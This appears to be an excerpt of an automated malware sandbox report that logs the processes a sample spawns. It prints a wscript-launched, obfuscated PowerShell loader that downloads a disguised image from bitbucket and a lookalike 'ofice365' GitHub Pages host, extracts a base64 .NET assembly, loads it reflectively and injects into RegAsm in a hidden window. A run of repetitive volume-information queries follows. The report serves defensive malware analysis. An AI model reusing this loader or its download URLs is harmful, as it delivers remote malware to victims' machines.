                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@c
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] ('txt.defgiei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@cJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] ('txt.defgiei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
